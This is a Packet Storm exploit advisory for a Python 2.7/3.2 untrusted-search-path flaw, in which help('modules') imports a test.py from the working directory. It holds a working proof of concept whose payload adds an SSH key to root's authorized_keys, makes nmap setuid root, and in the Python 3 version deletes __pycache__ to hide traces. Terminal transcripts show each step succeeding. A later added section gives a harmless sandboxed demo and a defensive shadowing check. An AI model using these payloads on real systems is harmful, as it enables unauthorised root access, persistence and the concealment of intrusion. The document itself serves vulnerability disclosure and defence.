Python Untrusted Search Path / Code Execution

Date: 09 Jul 2012
Reported by: rogueclown
Type: packetstorm
Source: packetstormsecurity.com

Python Untrusted Search Path / Code Execution, demonstrated against Python 2.7.2 and 3.2.1. Typing `help('modules')` in the interactive interpreter makes pydoc walk every `sys.path` entry with `pkgutil.walk_packages()`, which imports each package it finds so it can recurse into it. Among the packages pulled in this way are stdlib test subpackages (for example `json.tests`) that import the top-level name `test`, and the stdlib `test` package itself where it is installed. Because the interactive interpreter puts the current working directory (`''`) at `sys.path[0]`, ahead of the standard library, a `test.py` in the working directory is what that import resolves to, and its module body runs with the privileges of whoever typed `help('modules')`. In the transcript below a root user runs it from an attacker-writable directory, which appends a key to `/root/.ssh/authorized_keys` and makes `/usr/bin/nmap` setuid root. The practical caveat: the interpreter, pydoc and anything else that imports by bare name trust `sys.path[0]`, so never start an interactive or privileged Python session from a directory another user can write to.

Code
`# Exploit Title: Python untrusted search path/code execution vulnerability  
# Date: 7.6.12  
# Exploit Author: rogueclown  
# Vendor Homepage: http://www.python.org  
# Software Link: http://www.python.org/getit/releases/  
# Version: python 2.7.2 and python 3.2.1  
# Tested on: linux (my test machine was OpenSUSE 12.1)  
#  
# This is an expansion on www.exploit-db.com/exploits/19523/ -- a big thanks,  
# and the lion's share of the credit, to ShadowHatesYou ([email protected]).  
# They found the vulnerability; I just found a more generalized application  
# of it.  
#  
# Basically, I found that it's not just python-wrapper that executes a test.py  
# script within the current working directory when help('modules') is run --  
# python itself does that. In python 2, it works just as ShadowHatesYou showed  
# it in his python-wrapper exploit.  
#  
# This still works in python 3, but you have to do a bit more to cover your  
# tracks. In the working directory, python 3 drops a __pycache__ directory  
# with a .pyc file inside it. Most of the bytecode in there is not human  
# readable, but it displays the shell command called by the script in  
# plaintext, making it pretty obvious that something funny happened. However,  
# you can get around this by making sure that your test.py script removes the  
# __pycache__ directory from the working directory.  
#  
# rogueclown  
# [email protected]  
# 7.6.12  
  
############  
# PYTHON 2 #  
############  
  
adalia@bukkit:~/security/pythonwrapper> ls -hl test.py  
-rw-r--r-- 1 adalia users 144 Jul 4 15:47 test.py  
adalia@bukkit:~/security/pythonwrapper> cat test.py  
#!/usr/bin/python  
  
import os  
  
os.system("/bin/echo $(echo ssh-rsa rogueclown washere >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap")  
adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap  
-rwxr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap  
adalia@bukkit:~/security/pythonwrapper> su  
Password:  
bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys  
ls: cannot access /root/.ssh/authorized_keys: No such file or directory  
bukkit:/home/adalia/security/pythonwrapper # python  
Python 2.7.2 (default, Aug 19 2011, 20:41:43) [GCC] on linux2  
Type "help", "copyright", "credits" or "license" for more information.  
>>> help('modules')  
  
Please wait a moment while I gather a list of all available modules...  
  
  
/usr/lib64/python2.7/site-packages/gobject/constants.py:24: Warning: g_boxed_type_register_static: assertion `g_type_from_name (name) == 0' failed  
import gobject._gobject  
/usr/lib64/python2.7/site-packages/twisted/words/im/__init__.py:8: UserWarning: twisted.im will be undergoing a rewrite at some point in the future.  
warnings.warn("twisted.im will be undergoing a rewrite at some point in the future.")  
** Message: pygobject_register_sinkfunc is deprecated (GstObject)  
Alacarte abc gtkunixprint readline  
BaseHTTPServer aifc gzip repr  
Bastion antigravity hashlib resource  
BeautifulSoup anydbm heapq rexec  
BeautifulSoupTests argparse hmac rfc822  
CDROM array hotshot rlcompleter  
CGIHTTPServer ast hpmudext robotparser  
ConfigParser asynchat htmlentitydefs rpm  
Cookie asyncore htmllib runpy  
Crypto atexit httplib satsolver  
DLFCN atk httplib2 scanext  
DocXMLRPCServer atom ieee1284 sched  
HTMLParser audiodev ihooks scout  
IN base64 imaplib select  
MimeWriter bdb imghdr serial  
OpenSSL beaker imp sets  
PAM binascii importlib setuptools  
PyQt4 binhex imputil sgmllib  
Queue bisect inspect sha  
SimpleHTTPServer bsddb io shelve  
SimpleXMLRPCServer butterfly itertools shlex  
SocketServer bz2 json shutil  
StringIO cPickle keyword signal  
TYPES cProfile lib2to3 simplejson  
UserDict cStringIO libproxy sip  
UserList cairo libvboxjxpcom site  
UserString calendar libxml2 smbc  
VBoxAuth cgi libxml2mod smtpd  
VBoxAuthSimple cgitb linecache smtplib  
VBoxDD chunk linuxaudiodev sndhdr  
VBoxDD2 cmath locale socket  
VBoxDDU cmd logging spwd  
VBoxDbg code louie sqlite3  
VBoxGuestControlSvc codecs macpath sre  
VBoxGuestPropSvc codeop macurl2path sre_compile  
VBoxHeadless coherence mad sre_constants  
VBoxKeyboard collections mailbox sre_parse  
VBoxNetDHCP colorsys mailcap ssl  
VBoxOGLhostcrutil commands mako stat  
VBoxOGLhosterrorspu compileall markupbase statvfs  
VBoxOGLrenderspu compiler markupsafe string  
VBoxPython contextlib marshal stringold  
VBoxPython2_7 cookielib math stringprep  
VBoxREM copy md5 strop  
VBoxRT copy_reg mhlib struct  
VBoxSDL crypt mimetools subprocess  
VBoxSharedClipboard csv mimetypes sunau  
VBoxSharedCrOpenGL ctypes mimify sunaudio  
VBoxSharedFolders cups mmap symbol  
VBoxVMM cupsext modulefinder symtable  
VBoxXPCOM cupshelpers multifile sys  
VBoxXPCOMC curl multiprocessing sysconfig  
VirtualBox datetime mutagen syslog  
Xlib dbhash mutex tabnanny  
_LWPCookieJar dbus mygpoclient tarfile  
_MozillaCookieJar dbus_bindings netrc telepathy  
__builtin__ decimal new telnetlib  
__future__ difflib nis tempfile  
_abcoll dircache nntplib termios  
_ast dis ntpath textwrap  
_bisect distutils nturl2path this  
_bsddb doctest numbers thread  
_codecs drv_libxml2 numpy threading  
_codecs_cn dsextras opcode time  
_codecs_hk dumbdbm operator timeit  
_codecs_iso2022 dummy_thread optparse toaiff  
_codecs_jp dummy_threading os token  
_codecs_kr easy_install os2emxpath tokenize  
_codecs_tw email ossaudiodev trace  
_collections encodings packagekit traceback  
_csv errno pango tty  
_ctypes exceptions pangocairo twisted  
_ctypes_test eyeD3 papyon types  
_dbus_bindings fcntl parser unicodedata  
_dbus_glib_bindings feedparser pcardext unittest  
_elementtree filecmp pdb uno  
_functools fileinput pickle unohelper  
_hashlib fnmatch pickletools urlgrabber  
_heapq formatter pipes urllib  
_hotshot fpformat pkg_resources urllib2  
_io fractions pkgutil urlparse  
_json ftplib platform user  
_locale functools plistlib uu  
_lsprof future_builtins popen2 uuid  
_md5 gc poplib vboxapi  
_multibytecodec gdata posix vboxshell  
_multiprocessing genericpath posixfile volkeys  
_pyio getopt posixpath warnings  
_random getpass pprint wave  
_satsolver gettext profile weakref  
_sha gi pstats webbrowser  
_sha256 gio pty whichdb  
_sha512 glib pwd wsgiref  
_socket glob py_compile xdg  
_sqlite3 gmenu pyclbr xdrlib  
_sre gnome_sudoku pycurl xml  
_ssl gnomekeyring pydoc xmllib  
_strptime gobject pydoc_data xmlrpclib  
_struct gpod pyexpat xxsubtype  
_symtable gpodder pygst zeitgeist  
_testcapi grp pygtk zipfile  
_threading_local gst pynotify zipimport  
_warnings gstoption quopri zlib  
_weakref gtk random zope  
_weakrefset gtktrayicon re   
  
Enter any module name to get more help. Or, type "modules spam" to search  
for modules whose descriptions contain the word "spam".  
  
>>> exit()  
bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap  
-rwsr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap  
bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys  
ssh-rsa rogueclown washere  
bukkit:/home/adalia/security/pythonwrapper #  
  
  
############  
# PYTHON 3 #  
############  
  
adalia@bukkit:~/security/pythonwrapper> ls -hl test.py  
-rw-r--r-- 1 adalia users 169 Jul 4 15:51 test.py  
adalia@bukkit:~/security/pythonwrapper> cat test.py  
#!/usr/bin/python  
  
import os  
  
os.system("/bin/echo $(echo ssh-rsa rogueclown washere >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap; /bin/rm -rf __pycache__")  
adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap  
-rwxr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap  
adalia@bukkit:~/security/pythonwrapper> su  
Password:  
bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys  
ls: cannot access /root/.ssh/authorized_keys: No such file or directory  
bukkit:/home/adalia/security/pythonwrapper # python3  
Python 3.2.1 (default, Jul 18 2011, 16:24:40) [GCC] on linux2  
Type "help", "copyright", "credits" or "license" for more information.  
>>> help('modules')  
  
Please wait a moment while I gather a list of all available modules...  
  
  
CDROM binascii inspect shelve  
DLFCN binhex io shlex  
IN bisect itertools shutil  
TYPES builtins json signal  
__future__ bz2 keyword site  
_abcoll cProfile linecache smtpd  
_ast calendar locale smtplib  
_bisect cgi logging sndhdr  
_codecs cgitb macpath socket  
_codecs_cn chunk macurl2path socketserver  
_codecs_hk cmath mailbox spwd  
_codecs_iso2022 cmd mailcap sqlite3  
_codecs_jp code marshal sre_compile  
_codecs_kr codecs math sre_constants  
_codecs_tw codeop mimetypes sre_parse  
_collections collections mmap ssl  
_compat_pickle colorsys modulefinder stat  
_csv compileall multiprocessing string  
_ctypes concurrent netrc stringprep  
_datetime configparser nis struct  
_dummy_thread contextlib nntplib subprocess  
_elementtree copy ntpath sunau  
_functools copyreg nturl2path symbol  
_hashlib crypt numbers symtable  
_heapq csv opcode sys  
_io ctypes operator sysconfig  
_json datetime optparse syslog  
_locale decimal os tabnanny  
_lsprof difflib os2emxpath tarfile  
_markupbase dis ossaudiodev telnetlib  
_multibytecodec distutils parser tempfile  
_multiprocessing doctest pdb termios  
_pickle dummy_threading pickle textwrap  
_posixsubprocess email pickletools this  
_pyio encodings pipes threading  
_random errno pkgutil time  
_socket fcntl platform timeit  
_sqlite3 filecmp plistlib token  
_sre fileinput poplib tokenize  
_ssl fnmatch posix trace  
_string formatter posixpath traceback  
_strptime fractions pprint tty  
_struct ftplib profile turtle  
_symtable functools pstats types  
_thread gc pty unicodedata  
_threading_local genericpath pwd unittest  
_warnings getopt py_compile urllib  
_weakref getpass pyclbr uu  
_weakrefset gettext pydoc uuid  
abc glob pydoc_data warnings  
aifc grp queue wave  
antigravity gzip quopri weakref  
argparse hashlib random webbrowser  
array heapq re wsgiref  
ast hmac readline xdrlib  
asynchat html reprlib xxlimited  
asyncore http resource xxsubtype  
atexit imaplib rlcompleter zipfile  
audioop imghdr runpy zipimport  
base64 imp sched zlib  
bdb importlib select   
  
Enter any module name to get more help. Or, type "modules spam" to search  
for modules whose descriptions contain the word "spam".  
  
>>> exit()  
bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap  
-rwsr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap  
bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys  
ssh-rsa rogueclown washere  
bukkit:/home/adalia/security/pythonwrapper # ls __pycache__  
ls: cannot access __pycache__: No such file or directory  
bukkit:/home/adalia/security/pythonwrapper #   
`
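The shadowing primitive that the header comments describe, reproduced in a throwaway sandbox as an added example. This is not part of rogueclown's PoC: the package name `rc_shadow_demo` and the `lib/` and `cwd/` directories are invented for the demo, and the marker file written by the shadowing module stands in for the `os.system()` payload. The block does what `help('modules')` does under the hood (`pkgutil.walk_packages()` importing every package it meets) with an attacker-writable directory ahead of the library on `sys.path`, shows which file actually gets executed, and checks for the `__pycache__` artefact the PoC deletes (CPython 3 writes it beside the shadowing module; CPython 2 writes a `test.pyc` next to the source instead). It ends with a small defender-side check that lists files in a directory whose names collide with stdlib modules, which is exactly the condition the exploit needs.

```python
"""Added example, not part of rogueclown's PoC: reproduce in a throwaway
sandbox the sys.path shadowing that help('modules') triggers, then run a
small defender-side check over the same directory.  Package and directory
names here (rc_shadow_demo, lib/, cwd/) are invented for the demo."""
import importlib
import importlib.util
import os
import pkgutil
import shutil
import sys
import tempfile
import textwrap

# Invented package name: stands in for the stdlib 'test' package that the
# PoC's test.py shadows.  Nothing real is imported under this name.
DEMO_NAME = "rc_shadow_demo"


def build_sandbox(root):
    """Lay out two directories under root:
      lib/ -- a legitimate package DEMO_NAME/__init__.py (the 'library')
      cwd/ -- the attacker-writable working directory holding DEMO_NAME.py
    The cwd module writes a marker file when executed; that line is the
    harmless stand-in for the os.system() payload in the original PoC."""
    lib = os.path.join(root, "lib")
    cwd = os.path.join(root, "cwd")
    os.makedirs(os.path.join(lib, DEMO_NAME))
    os.makedirs(cwd)
    with open(os.path.join(lib, DEMO_NAME, "__init__.py"), "w") as f:
        f.write("# legitimate package: this is what should be imported\n")
    marker = os.path.join(root, "payload_ran")
    with open(os.path.join(cwd, DEMO_NAME + ".py"), "w") as f:
        f.write(textwrap.dedent(f"""\
            # attacker-controlled module body (constructed for the demo)
            with open({marker!r}, "w") as fh:
                fh.write("executed")
        """))
    return lib, cwd, marker


def run_scan(lib, cwd):
    """Do what help('modules') does: walk lib with pkgutil.walk_packages(),
    which calls __import__() on every package it finds so it can recurse.
    __import__ resolves through sys.path, not through the directory being
    scanned, so with cwd ahead of lib the attacker's file is the one run.
    (Interactive python puts '' -- the cwd -- at sys.path[0]; the same
    thing happens when a walked package's __init__ does 'import test'.)"""
    saved_path = list(sys.path)
    sys.path[:0] = [cwd, lib]
    importlib.invalidate_caches()
    try:
        found = [(name, ispkg) for _, name, ispkg in pkgutil.walk_packages([lib])]
        mod = sys.modules.get(DEMO_NAME)
        src = os.path.abspath(mod.__file__) if mod else None
        return {
            "scanned_as_package": (DEMO_NAME, True) in found,
            "imported_from": src,
            # Python 3 caches the attacker's module as __pycache__/*.pyc next
            # to it: the forensic artefact the PoC removes with rm -rf.
            "pycache_written": bool(src) and os.path.exists(
                importlib.util.cache_from_source(src)),
            "bytecode_disabled": sys.dont_write_bytecode,
        }
    finally:
        sys.path[:] = saved_path
        sys.modules.pop(DEMO_NAME, None)


def shadowing_files(directory, names=None):
    """Defender-side check: top-level .py files or package directories in
    `directory` whose name collides with a module/package in `names`
    (default: the stdlib names the interpreter knows about).  Any hit would
    hijack a bare import of that name while `directory` leads sys.path."""
    if names is None:
        # sys.stdlib_module_names exists from 3.10; older interpreters only
        # get the one name the PoC relies on.
        names = getattr(sys, "stdlib_module_names", frozenset({"test"}))
    hits = []
    for entry in sorted(os.listdir(directory)):
        base, ext = os.path.splitext(entry)
        is_pkg_dir = os.path.isdir(os.path.join(directory, entry))
        if (ext == ".py" or is_pkg_dir) and base in names:
            hits.append(entry)
    return hits


def demo():
    """Build the sandbox, run the scan, audit the cwd, and clean up."""
    root = tempfile.mkdtemp(prefix="pydoc_shadow_")
    try:
        lib, cwd, marker = build_sandbox(root)
        result = run_scan(lib, cwd)
        result["payload_ran"] = os.path.exists(marker)
        result["expected_from"] = os.path.abspath(os.path.join(cwd, DEMO_NAME + ".py"))
        result["shadowing_in_cwd"] = shadowing_files(cwd, names={DEMO_NAME})
        return result
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it as a plain script (`python3 shadow_demo.py`, filename hypothetical) and `imported_from` points at the copy in `cwd/`, not the legitimate package in `lib/`, even though only `lib/` was handed to the walker; `payload_ran` confirms the module body executed. The audit in `shadowing_files()` is cheap enough to run against the working directory before dropping into an interactive interpreter as a privileged user, which is the situation the PoC abuses.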
